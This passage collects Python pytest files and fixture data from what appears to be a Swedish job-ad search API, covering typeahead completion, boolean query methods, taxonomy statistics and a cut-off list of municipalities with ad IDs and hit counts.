json_response_region_filter = get_complete(session, params={'q': query, 'region': geo.stockholms_lan})
top_value_region_filter = json_response_region_filter['typeahead'][0]['occurrences']
top_word_regionfilter = json_response_region_filter['typeahead'][0]['value']
msg_city = f"Query: {query}, no filter: {top_word_no_filter}: {top_value_no_filter}, geo filter: {top_word_municipality_filter}: {top_value_municipality_filter} "
msg_region = f"Query: {query}, no filter: {top_word_no_filter}: {top_value_no_filter}, geo filter: {top_word_regionfilter}: {top_value_region_filter} "
assert top_value_no_filter > top_value_municipality_filter, msg_city
assert top_value_no_filter > top_value_region_filter, msg_region
assert top_value_municipality_filter > 0
assert top_value_region_filter > 0
```
#### File: searching/jobsearch/test_freetext_bool_complete.py
```python
import pytest
import copy
from tests.test_resources.helper import get_complete, get_complete_with_headers
from common.settings import X_FEATURE_FREETEXT_BOOL_METHOD
from tests.test_resources.test_settings import test_headers
@pytest.mark.jobsearch
@pytest.mark.parametrize("query",
['stockholm sj', 'stor s', 'lärare st', 'special a', 'stockholm ', ' ', 'programmering '])
def test_complete_endpoint_with_freetext_bool_method(session, query):
"""
test of /complete endpoint with X_FEATURE_FREETEXT_BOOL_METHOD set to 'and' / 'or' / default value
Verifies that results are identical regardless of bool method
"""
params = {'q': query, 'limit': 0}
# no special header, default values are used
result_default = get_complete(session, params)
# use 'and'
tmp_headers = copy.deepcopy(test_headers)
tmp_headers[X_FEATURE_FREETEXT_BOOL_METHOD] = 'and'
result_and = get_complete_with_headers(session, params, tmp_headers)
    # use 'or'
tmp_headers[X_FEATURE_FREETEXT_BOOL_METHOD] = 'or'
result_or = get_complete_with_headers(session, params, tmp_headers)
# check that results are identical regardless of which bool_method is used
assert result_default['typeahead'] == result_and['typeahead'] == result_or['typeahead']
```
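Both files above import typeahead helpers from `tests/test_resources/helper.py`. A minimal sketch of what `get_complete` and `get_complete_with_headers` are assumed to do (the `/complete` path comes from the docstring above; implementation details may differ):
```python
# Hypothetical sketch of the typeahead helpers assumed by the tests above.
import requests

from tests.test_resources.test_settings import TEST_URL, test_headers


def get_complete(session, params):
    # Typeahead request with the default test headers.
    return get_complete_with_headers(session, params, test_headers)


def get_complete_with_headers(session, params, headers):
    # Typeahead request with caller-supplied headers (e.g. an X-Feature header).
    response = session.get(TEST_URL + "/complete", params=params, headers=headers)
    response.raise_for_status()
    return response.json()
```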
#### File: integration_tests/search/conftest.py
```python
import os
import pytest
import requests
from tests.test_resources.test_settings import test_headers
@pytest.fixture(scope="session")
def integration_session():
    """
    Creates a requests Session object that persists for the entire test run (session scope).
    HTTP connections are reused (higher performance, less resource usage).
    Returns a Session object.
    """
s = requests.sessions.Session()
s.headers.update(test_headers)
return s
@pytest.fixture(scope="session")
def integration_url():
    """
    Returns the base URL for the integration test environment.
    """
test_url = os.getenv('TEST_URL_INTEGRATION', 'http://127.0.0.1')
port = os.getenv('TEST_PORT_INTEGRATION', 5000)
return f"{test_url}:{port}"
```
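A test that uses these fixtures simply declares them as arguments and lets pytest inject them. A brief usage sketch (the `/search` path and the expected status code are assumptions for illustration):
```python
# Hypothetical usage of the fixtures above: pytest injects them by name.
def test_search_endpoint_responds(integration_session, integration_url):
    response = integration_session.get(f"{integration_url}/search", params={'limit': 0})
    assert response.status_code == 200
```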
#### File: integration_tests/search/test_complete.py
```python
import pytest
import logging
from sokannonser.repository.querybuilder import QueryBuilder
from sokannonser.repository.typeahead import _check_search_word_type
@pytest.mark.parametrize("search_text, expected_result", [
('', None),
('stockholm', 'location'),
('"stockholm', None),
('städare &', None), # could be improved to return 'occupation', but this is what we get now (and no 400)
])
def test_check_search_word_type_nar_862_and_1107(caplog, search_text, expected_result):
"""
Tests for search word type
"""
result = _check_search_word_type(search_text, QueryBuilder())
log_levels = [tup[1] for tup in caplog.record_tuples]
assert logging.ERROR not in log_levels, "Logging error from elastic call"
assert logging.WARNING not in log_levels, "Logging warning from elastic call"
assert result == expected_result
```
#### File: integration_tests/search/test_taxonomy.py
```python
import logging
import pytest
import re
from common import taxonomy as t
from sokannonser.repository.valuestore import get_stats_for
log = logging.getLogger(__name__)
tax_stat = [[t.OCCUPATION], [t.GROUP], [t.FIELD], [t.SKILL]]
tax_other = [[t.MUNICIPALITY], [t.REGION]]
tax_noexist = [[' ', 'blabla', '']]
@pytest.mark.parametrize("taxonomy_type", tax_stat + tax_other + tax_noexist)
def test_get_stats_for_taxonomy_type(taxonomy_type):
if taxonomy_type not in tax_stat:
try:
get_stats_for(taxonomy_type)
except KeyError as e:
print('KeyError exception. Reason: taxonomy type %s' % str(e))
assert "'" + taxonomy_type + "'" == str(e)
except Exception as ex:
pytest.fail('ERROR: This is not a KeyError exception: %s (%s)' %
(str(ex), taxonomy_type), pytrace=False)
    else:  # taxonomy_type is one of the stats types handled by get_stats_for()
for k, v in get_stats_for(taxonomy_type).items():
assert is_str_of_int(k) # check k is string of int
assert isinstance(v, int) # check v is int
@pytest.mark.parametrize("taxonomy_type", (tax_noexist))
def test_get_stats_for_taxonomy_type_neg(taxonomy_type):
assert get_stats_for(taxonomy_type) == {}
@pytest.mark.parametrize("taxonomy_type", tax_other)
def test_get_stats_for_taxonomy_type_other(taxonomy_type):
assert get_stats_for(taxonomy_type) != {}
@pytest.mark.parametrize("v", ['a', 'abc', '-1'])
def test_is_char_as_str(v):
with pytest.raises(AssertionError):
assert is_int(v)
@pytest.mark.parametrize("v", ['1', '0', '10000'])
def test_is_int_as_str(v):
assert is_int(v)
@pytest.mark.parametrize("v", [0, 1, 1000])
def test_is_int_as_int(v):
with pytest.raises(TypeError):
assert is_int(v)
def is_int(value):
return re.match(r'[0-9]+$', value) is not None
def is_str_of_int(str_to_check):
    return re.match(r'^[\w\d_-]*$', str_to_check) is not None  # loose check: word chars, digits, '_' and '-' (not strictly digits)
```
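Because the names of the two regex helpers are easy to misread, here is a self-contained illustration of what they actually accept (definitions repeated from the file above so the snippet runs on its own):
```python
import re


def is_int(value):
    return re.match(r'[0-9]+$', value) is not None


def is_str_of_int(str_to_check):
    return re.match(r'^[\w\d_-]*$', str_to_check) is not None


assert is_int('123')             # digits only
assert not is_int('-1')          # a leading minus is rejected
assert is_str_of_int('0180')     # digit strings match...
assert is_str_of_int('abc_1-2')  # ...but so do word chars, '_' and '-'
```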
#### File: test_resources/concept_ids/municipality.py
```python
from tests.test_resources.helper import select_random_from_list
def get_muncipalities_with_hits():
with_hits = []
for m in municipalities:
if m['hits'] > 0:
with_hits.append(m)
return with_hits
def get_ten_random_municipalities_with_hits():
return select_random_from_list(full_list=get_muncipalities_with_hits(), how_many=10)
municipalities = [
    {'id': 'XWKY_c49_5nv', 'name': 'Upplands Väsby', 'type': 'municipality', 'code': '0114', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 14,
'ad_ids': ['24641303', '24641232', '24636479', '24630746', '24627847', '24612651', '24608713', '24603235',
'24598186', '24580428']},
{'id': 'K4az_Bm6_hRV', 'name': 'Vallentuna', 'type': 'municipality', 'code': '0115', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 7,
'ad_ids': ['24649005', '24648696', '24641486', '24611368', '24590586', '24556609', '24519998']},
{'id': '8gKt_ZsV_PGj', 'name': 'Österåker', 'type': 'municipality', 'code': '0117', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 8,
'ad_ids': ['24640198', '24634294', '23699999', '24624738', '24577311', '24576867', '24532362', '24518247']},
{'id': '15nx_Vut_GrH', 'name': 'Värmdö', 'type': 'municipality', 'code': '0120', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 11,
'ad_ids': ['24632907', '24631461', '24620746', '24614472', '24610276', '24602803', '24590922', '24577016',
'24574442', '24509435']},
{'id': 'qm5H_jsD_fUF', 'name': 'Järfälla', 'type': 'municipality', 'code': '0123', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 16,
'ad_ids': ['24648843', '24647618', '24638674', '24637614', '24627854', '24626944', '24623198', '24622371',
'24619258', '24616216']},
{'id': 'magF_Gon_YL2', 'name': 'Ekerö', 'type': 'municipality', 'code': '0125', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 11,
'ad_ids': ['24647866', '24643150', '24638266', '24637006', '24626766', '24618010', '24617986', '24609385',
'24601615', '24541639']},
{'id': 'g1Gc_aXK_EKu', 'name': 'Huddinge', 'type': 'municipality', 'code': '0126', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 47,
'ad_ids': ['24649947', '24649919', '24649818', '24647357', '24641723', '24640701', '24639742', '24638132',
'24636901',
'24633282']},
{'id': 'CCVZ_JA7_d3y', 'name': 'Botkyrka', 'type': 'municipality', 'code': '0127', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 20,
'ad_ids': ['24649834', '24649058', '24645367', '24642952', '24637457', '24635479', '24634919', '24629461',
'24622699', '24615777']},
{'id': '4KBw_CPU_VQv', 'name': 'Salem', 'type': 'municipality', 'code': '0128', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 2, 'ad_ids': ['24635325', '24596057']},
{'id': 'Q7gp_9dT_k2F', 'name': 'Haninge', 'type': 'municipality', 'code': '0136', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 17,
'ad_ids': ['24650480', '24647950', '24630278', '24623592', '24616301', '24614366', '24606163', '24604574',
'24589305', '24586867']},
{'id': 'sTPc_k2B_SqV', 'name': 'Tyresö', 'type': 'municipality', 'code': '0138', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 7,
'ad_ids': ['24643255', '24624425', '24618754', '24614988', '24613766', '24598566', '24597634']},
{'id': 'w6yq_CGR_Fiv', 'name': 'Upplands-Bro', 'type': 'municipality', 'code': '0139', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 11,
'ad_ids': ['24649677', '24644808', '24643168', '24643140', '24641431', '24554813', '24628120', '24614768',
'24604245', '24603297']},
{'id': 'mBKv_q3B_SK8', 'name': 'Nykvarn', 'type': 'municipality', 'code': '0140', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 7,
'ad_ids': ['24649772', '24645739', '24644051', '24637850', '24630053', '24625534', '24589239']},
{'id': 'onpA_B5a_zfv', 'name': 'Täby', 'type': 'municipality', 'code': '0160', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 25,
'ad_ids': ['24640762', '24640430', '24640171', '24637534', '24625126', '24624931', '24613119', '24611999',
'24610353', '24609668']},
{'id': 'E4CV_a5E_ucX', 'name': 'Danderyd', 'type': 'municipality', 'code': '0162', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 18,
'ad_ids': ['24650650', '24650652', '24643754', '24639629', '24638561', '24638260', '24614446', '24611837',
'24609748', '24597392']},
{'id': 'Z5Cq_SgB_dsB', 'name': 'Sollentuna', 'type': 'municipality', 'code': '0163', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 8,
'ad_ids': ['24648025', '24646503', '24634127', '24627899', '24624197', '24612586', '24605084', '24604254']},
{'id': 'AvNB_uwa_6n6', 'name': 'Stockholm', 'type': 'municipality', 'code': '0180', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 775,
'ad_ids': ['24650983', '24650895', '24650889', '24650784', '24650759', '24650748', '24650728', '24650682',
'24650497', '24650349']},
{'id': 'g6hK_M1o_hiU', 'name': 'Södertälje', 'type': 'municipality', 'code': '0181', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 52,
'ad_ids': ['24650352', '24647317', '24646726', '24644816', '24644223', '24642658', '24642513', '24641912',
'24641018', '24640024']},
{'id': 'aYA7_PpG_BqP', 'name': 'Nacka', 'type': 'municipality', 'code': '0182', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 27,
'ad_ids': ['24649527', '24649274', '24645898', '24644478', '24581554', '24636080', '24634930', '24628301',
'24627163', '24621428']},
{'id': 'UTJZ_zHH_mJm', 'name': 'Sundbyberg', 'type': 'municipality', 'code': '0183', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 11,
'ad_ids': ['24643175', '24638423', '24637895', '24621759', '24611001', '24605909', '24602420', '24599279',
'24590884', '24552397']},
{'id': 'zHxw_uJZ_NJ8', 'name': 'Solna', 'type': 'municipality', 'code': '0184', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 61,
'ad_ids': ['24650876', '24649894', '24649491', '24648158', '24644646', '24643212', '24641524', '24640665',
'24639217', '24638221']},
{'id': 'FBbF_mda_TYD', 'name': 'Lidingö', 'type': 'municipality', 'code': '0186', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 13,
'ad_ids': ['24648043', '24648032', '24645326', '24631039', '24238908', '24611032', '24606240', '24604895',
'24603294', '24593721']},
{'id': '9aAJ_j6L_DST', 'name': 'Vaxholm', 'type': 'municipality', 'code': '0187', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 2, 'ad_ids': ['24618958', '24542055']},
{'id': 'btgf_fS7_sKG', 'name': 'Norrtälje', 'type': 'municipality', 'code': '0188', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 26,
'ad_ids': ['24647156', '24645902', '24645523', '24644525', '24638282', '24639147', '24636961', '24633665',
'24628281', '24626958']},
{'id': '8ryy_X54_xJj', 'name': 'Sigtuna', 'type': 'municipality', 'code': '0191', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 19,
'ad_ids': ['24649537', '24648645', '24645926', '24643945', '24636904', '24636803', '24634498', '24633655',
'24631760', '24628534']},
{'id': '37UU_T7x_oxG', 'name': 'Nynäshamn', 'type': 'municipality', 'code': '0192', 'region_code': '01',
'region_name': 'Stockholms län', 'hits': 12,
'ad_ids': ['24649508', '24649463', '24643147', '24642006', '24636125', '24620822', '24616700', '24600203',
'24575057', '24566977']},
{'id': 'Bbs5_JUs_Qh5', 'name': 'Håbo', 'type': 'municipality', 'code': '0305', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 5, 'ad_ids': ['24650354', '24645507', '24643909', '24562714', '24485221']},
{'id': 'cbyw_9aK_Cni', 'name': 'Älvkarleby', 'type': 'municipality', 'code': '0319', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 1, 'ad_ids': ['24623380']},
{'id': 'KALq_sG6_VrW', 'name': 'Knivsta', 'type': 'municipality', 'code': '0330', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 5, 'ad_ids': ['24634631', '24610544', '24593401', '24577340', '24499916']},
{'id': 'K8A2_JBa_e6e', 'name': 'Tierp', 'type': 'municipality', 'code': '0360', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 5, 'ad_ids': ['24646413', '24642957', '24632440', '24629420', '24593674']},
{'id': 'otaF_bQY_4ZD', 'name': 'Uppsala', 'type': 'municipality', 'code': '0380', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 116,
'ad_ids': ['24650128', '24649375', '24649111', '24648825', '24648007', '24641555', '24647083', '24642165',
'24645085', '24643472']},
{'id': 'HGwg_unG_TsG', 'name': 'Enköping', 'type': 'municipality', 'code': '0381', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 31,
'ad_ids': ['24649986', '24640955', '24636030', '24634261', '24634124', '24633958', '24633755', '24632200',
'24631332', '24630750']},
{'id': 'VE3L_3Ei_XbG', 'name': 'Östhammar', 'type': 'municipality', 'code': '0382', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 7,
'ad_ids': ['24636870', '24620508', '24610180', '24602559', '24545246', '24528574', '24456277']},
{'id': 'rut9_f5W_kTX', 'name': 'Vingåker', 'type': 'municipality', 'code': '0428', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 3, 'ad_ids': ['24630384', '24611402', '24610522']},
{'id': 'os8Y_RUo_U3u', 'name': 'Gnesta', 'type': 'municipality', 'code': '0461', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 7,
'ad_ids': ['24624678', '24614695', '24606086', '24539789', '24527883', '24452669', '24437897']},
{'id': 'KzvD_ePV_DKQ', 'name': 'Nyköping', 'type': 'municipality', 'code': '0480', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 32,
'ad_ids': ['24648507', '24647220', '24646241', '24644029', '24643813', '24640685', '24638209', '24621102',
'24619295', '24618870']},
{'id': '72XK_mUU_CAH', 'name': 'Oxelösund', 'type': 'municipality', 'code': '0481', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 6,
'ad_ids': ['24650534', '24638207', '24635193', '24627634', '24572186', '24470292']},
{'id': 'P8yp_WT9_Bks', 'name': 'Flen', 'type': 'municipality', 'code': '0482', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 8,
'ad_ids': ['24642920', '24642061', '24617764', '24617668', '24584928', '24570283', '24457975', '24252077']},
{'id': 'snx9_qVD_Dr1', 'name': 'Katrineholm', 'type': 'municipality', 'code': '0483', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 11,
'ad_ids': ['24641421', '24640118', '24638917', '24634274', '24632221', '24627764', '24624267', '24572047',
'24499697', '24462987']},
{'id': 'kMxr_NiX_YrU', 'name': 'Eskilstuna', 'type': 'municipality', 'code': '0484', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 37,
'ad_ids': ['24649500', '24648293', '24642848', '24642008', '24635208', '24634840', '24634180', '24624433',
'24623481', '24622346']},
{'id': 'shnD_RiE_RKL', 'name': 'Strängnäs', 'type': 'municipality', 'code': '0486', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 13,
'ad_ids': ['24645062', '24640755', '24633881', '24629018', '24628036', '24626818', '24620342', '24617315',
'24613763', '24606350']},
{'id': 'rjzu_nQn_mCK', 'name': 'Trosa', 'type': 'municipality', 'code': '0488', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 6,
'ad_ids': ['24629673', '24617357', '24615644', '24601519', '24573221', '24568390']},
{'id': 'Fu8g_29u_3xF', 'name': 'Ödeshög', 'type': 'municipality', 'code': '0509', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 4, 'ad_ids': ['24633236', '24604733', '24604699', '24536516']},
{'id': 'vRRz_nLT_vYv', 'name': 'Ydre', 'type': 'municipality', 'code': '0512', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 1, 'ad_ids': ['24489383']},
{'id': 'U4XJ_hYF_FBA', 'name': 'Kinda', 'type': 'municipality', 'code': '0513', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 4, 'ad_ids': ['24640366', '24620200', '24513240', '24434591']},
{'id': 'e5LB_m9V_TnT', 'name': 'Boxholm', 'type': 'municipality', 'code': '0560', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 1, 'ad_ids': ['24614590']},
{'id': 'bFWo_FRJ_x2T', 'name': 'Åtvidaberg', 'type': 'municipality', 'code': '0561', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 1, 'ad_ids': ['24614818']},
{'id': 'dMFe_J6W_iJv', 'name': 'Finspång', 'type': 'municipality', 'code': '0562', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 7,
'ad_ids': ['24644134', '24625540', '24612693', '24611379', '24590409', '24583823', '24471628']},
{'id': 'Sb3D_iGB_aXu', 'name': 'Valdemarsvik', 'type': 'municipality', 'code': '0563', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 3, 'ad_ids': ['24645130', '24645129', '24597478']},
{'id': 'bm2x_1mr_Qhx', 'name': 'Linköping', 'type': 'municipality', 'code': '0580', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 110,
'ad_ids': ['24650847', '24650299', '24650286', '24650132', '24650066', '24649942', '24649791', '24649190',
'24648447', '24647737']},
{'id': 'SYty_Yho_JAF', 'name': 'Norrköping', 'type': 'municipality', 'code': '0581', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 77,
'ad_ids': ['24645698', '24644342', '24642624', '24642581', '24642596', '24638971', '24637959', '24636774',
'24635847', '24635810']},
{'id': 'Pcv9_yYh_Uw8', 'name': 'Söderköping', 'type': 'municipality', 'code': '0582', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 5,
'ad_ids': ['24643307', '24593500', '24592848', '24579758', '24540435']},
{'id': 'E1MC_1uG_phm', 'name': 'Motala', 'type': 'municipality', 'code': '0583', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 13,
'ad_ids': ['24650644', '24647728', '24647601', '24644258', '24639992', '24635027', '24627968', '24625493',
'24611718', '24574665']},
{'id': 'VcCU_Y86_eKU', 'name': 'Vadstena', 'type': 'municipality', 'code': '0584', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 6,
'ad_ids': ['24636656', '24631849', '24613868', '24605632', '24597399', '24579124']},
{'id': 'stqv_JGB_x8A', 'name': 'Mjölby', 'type': 'municipality', 'code': '0586', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 17,
'ad_ids': ['24648019', '24644313', '24632147', '24628098', '24622278', '24616742', '24596459', '24615796',
'24613095', '24605455']},
{'id': 'yaHU_E7z_YnE', 'name': 'Lekeberg', 'type': 'municipality', 'code': '1814', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 3, 'ad_ids': ['24618574', '24590700', '24573858']},
{'id': 'oYEQ_m8Q_unY', 'name': 'Laxå', 'type': 'municipality', 'code': '1860', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24613284']},
{'id': 'Ak9V_rby_yYS', 'name': 'Hallsberg', 'type': 'municipality', 'code': '1861', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 5, 'ad_ids': ['24645029', '24641916', '24630258', '24625794', '23791205']},
{'id': 'pvzC_muj_rcq', 'name': 'Degerfors', 'type': 'municipality', 'code': '1862', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24640136', '24612483']},
{'id': 'sCbY_r36_xhs', 'name': 'Hällefors', 'type': 'municipality', 'code': '1863', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24597505', '24562629']},
{'id': 'eF2n_714_hSU', 'name': 'Ljusnarsberg', 'type': 'municipality', 'code': '1864', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24620853']},
{'id': 'kuMn_feU_hXx', 'name': 'Örebro', 'type': 'municipality', 'code': '1880', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 83,
'ad_ids': ['24650582', '24650365', '24649289', '24649147', '24648442', '24648272', '24648247', '24647801',
'24646747', '24646234']},
{'id': 'viCA_36P_pQp', 'name': 'Kumla', 'type': 'municipality', 'code': '1881', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 6,
'ad_ids': ['24628041', '24627103', '24620812', '24612404', '24591455', '24525516']},
{'id': 'dbF7_Ecz_CWF', 'name': 'Askersund', 'type': 'municipality', 'code': '1882', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24614139']},
{'id': 'wgJm_upX_z5W', 'name': 'Karlskoga', 'type': 'municipality', 'code': '1883', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 14,
'ad_ids': ['24641108', '24640044', '24638125', '24627556', '24626010', '24619701', '24614690', '24596123',
'24574044', '24506835']},
{'id': 'WFXN_hsU_gmx', 'name': 'Nora', 'type': 'municipality', 'code': '1884', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24645958', '24641024']},
{'id': 'JQE9_189_Ska', 'name': 'Lindesberg', 'type': 'municipality', 'code': '1885', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 9,
'ad_ids': ['24621412', '24640141', '24640009', '24631398', '24629694', '24619671', '24594052', '24563255',
'24559937']},
{'id': 'Nufj_vmt_VrH', 'name': 'Skinnskatteberg', 'type': 'municipality', 'code': '1904', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 2, 'ad_ids': ['24616844', '24561824']},
{'id': 'jfD3_Hdg_UhT', 'name': 'Surahammar', 'type': 'municipality', 'code': '1907', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 2, 'ad_ids': ['24569744', '24569099']},
{'id': 'sD2e_1Tr_4WZ', 'name': 'Heby', 'type': 'municipality', 'code': '0331', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 6,
'ad_ids': ['24639987', '24637102', '24636561', '24622419', '24609485', '24606439']},
{'id': 'Fac5_h7a_UoM', 'name': 'Kungsör', 'type': 'municipality', 'code': '1960', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 1, 'ad_ids': ['24615040']},
{'id': 'oXYf_HmD_ddE', 'name': 'Hallstahammar', 'type': 'municipality', 'code': '1961', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 3, 'ad_ids': ['24620856', '24620183', '24570400']},
{'id': 'jbVe_Cps_vtd', 'name': 'Norberg', 'type': 'municipality', 'code': '1962', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 1, 'ad_ids': ['24615173']},
{'id': '8deT_FRF_2SP', 'name': 'Västerås', 'type': 'municipality', 'code': '1980', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 53,
'ad_ids': ['24650320', '24648681', '24647561', '24647061', '24646018', '24645554', '24645115', '24643524',
'24643419', '24641832']},
{'id': 'dAen_yTK_tqz', 'name': 'Sala', 'type': 'municipality', 'code': '1981', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 9,
'ad_ids': ['24647939', '24629771', '24628165', '24627608', '24625106', '24625081', '24618592', '24607178',
'24568713']},
{'id': '7D9G_yrX_AGJ', 'name': 'Fagersta', 'type': 'municipality', 'code': '1982', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 6,
'ad_ids': ['24642864', '24636952', '24621583', '24611864', '24610150', '24596200']},
{'id': '4Taz_AuG_tSm', 'name': 'Köping', 'type': 'municipality', 'code': '1983', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 5,
'ad_ids': ['24641084', '24633855', '24614521', '24579728', '24554788']},
{'id': 'Jkyb_5MQ_7pB', 'name': 'Arboga', 'type': 'municipality', 'code': '1984', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 6,
'ad_ids': ['24634844', '24632224', '24630389', '24629338', '24628382', '24523724']},
{'id': '1gEC_kvM_TXK', 'name': 'Olofström', 'type': 'municipality', 'code': '1060', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 3, 'ad_ids': ['24650780', '24607103', '24588059']},
{'id': 'YSt4_bAa_ccs', 'name': 'Karlskrona', 'type': 'municipality', 'code': '1080', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 28,
'ad_ids': ['24651075', '24649518', '24649448', '24645432', '24645121', '24644839', '24628869', '24633251',
'24633023', '24630721']},
{'id': 'vH8x_gVz_z7R', 'name': 'Ronneby', 'type': 'municipality', 'code': '1081', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 10,
'ad_ids': ['24648307', '24648283', '24635765', '24621669', '24621710', '24620613', '24605177', '24605428',
'24603527', '24590026']},
{'id': 'HtGW_WgR_dpE', 'name': 'Karlshamn', 'type': 'municipality', 'code': '1082', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 15,
'ad_ids': ['24649847', '24649768', '24647740', '24632517', '24612809', '24607875', '24607874', '24602594',
'24600682', '24600425']},
{'id': 'EVPy_phD_8Vf', 'name': 'Sölvesborg', 'type': 'municipality', 'code': '1083', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 4, 'ad_ids': ['24644857', '24625704', '24620694', '24535492']},
{'id': '2r6J_g2w_qp5', 'name': 'Svalöv', 'type': 'municipality', 'code': '1214', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 1, 'ad_ids': ['24645986']},
{'id': 'vBrj_bov_KEX', 'name': 'Staffanstorp', 'type': 'municipality', 'code': '1230', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24648873', '24623551', '24614129', '24598158', '24593510', '24562275', '24565177', '24514487']},
{'id': '64g5_Lio_aMU', 'name': 'Burlöv', 'type': 'municipality', 'code': '1231', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 9,
'ad_ids': ['24649934', '24624002', '24615590', '24596313', '24598750', '24592314', '24583797', '24565624',
'24440835']},
{'id': 'Tcog_5sH_b46', 'name': 'Vellinge', 'type': 'municipality', 'code': '1233', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 3, 'ad_ids': ['24637147', '24622105', '24546803']},
    {'id': 'LTt7_CGG_RUf', 'name': 'Östra Göinge', 'type': 'municipality', 'code': '1256', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24615444', '24610769', '24593919', '24589529']},
{'id': 'nBTS_Nge_dVH', 'name': 'Örkelljunga', 'type': 'municipality', 'code': '1257', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 1, 'ad_ids': ['24620885']},
{'id': 'waQp_FjW_qhF', 'name': 'Bjuv', 'type': 'municipality', 'code': '1260', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 2, 'ad_ids': ['24614178', '24590365']},
{'id': '5ohg_WJU_Ktn', 'name': 'Kävlinge', 'type': 'municipality', 'code': '1261', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 10,
'ad_ids': ['24645728', '24640743', '24637954', '24634361', '24631933', '24622076', '24615122', '24601405',
'24584558', '24570281']},
{'id': 'naG4_AUS_z2v', 'name': 'Lomma', 'type': 'municipality', 'code': '1262', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 10,
'ad_ids': ['24650188', '24649514', '24630578', '24607479', '24607474', '24593043', '24587683', '24555292',
'24549470', '24500680']},
{'id': 'n6r4_fjK_kRr', 'name': 'Svedala', 'type': 'municipality', 'code': '1263', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24648311', '24624676', '24615959', '24590287']},
